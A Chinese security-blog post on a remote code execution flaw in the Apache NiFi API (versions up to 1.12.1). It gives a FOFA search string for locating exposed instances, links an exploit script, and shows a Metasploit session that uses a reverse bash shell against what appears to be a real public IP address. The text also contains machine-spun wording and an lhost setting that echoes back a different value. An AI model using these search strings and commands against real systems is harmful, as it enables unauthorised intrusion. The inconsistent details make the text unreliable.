Apache NiFi Api 远程代码执行(RCE)

破绽简介

Apache NiFi 是一个易于运用、功用强大而且牢靠的数据处置和分发系统。Apache NiFi 是为数据流设计。它支持高度可配置的指示图的数据路由、转换和系统中介逻辑。
 


        

影响版本

Apache NiFi  <= 1.12.1
 


 

FOFA

"nifi" && title=="NiFi"

 


 

破绽复现

脚本

https://github.com/imjdl/Apache-NiFi-Api-RCE

图片[1]-Apache NiFi Api 远程代码执行(RCE)-孤勇者社区
 

msf停止攻击

msf6 > use exploit/multi/http/apache_nifi_processor_rce
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/http/apache_nifi_processor_rce) > set lhost 192.168.60.7
lhost => 0.0.0.0
msf6 exploit(multi/http/apache_nifi_processor_rce) > set lport 4444
lport => 4444
msf6 exploit(multi/http/apache_nifi_processor_rce) > set rhosts 目的ip
rhosts => 74.208.80.242
msf6 exploit(multi/http/apache_nifi_processor_rce) > set rport 目的端口
rport => 9090
msf6 exploit(multi/http/apache_nifi_processor_rce) > run

图片[2]-Apache NiFi Api 远程代码执行(RCE)-孤勇者社区

执行run,开端攻击,获取shell。

图片[3]-Apache NiFi Api 远程代码执行(RCE)-孤勇者社区
 

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞8赞赏 分享
评论 共1条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片
    • 头像惨出0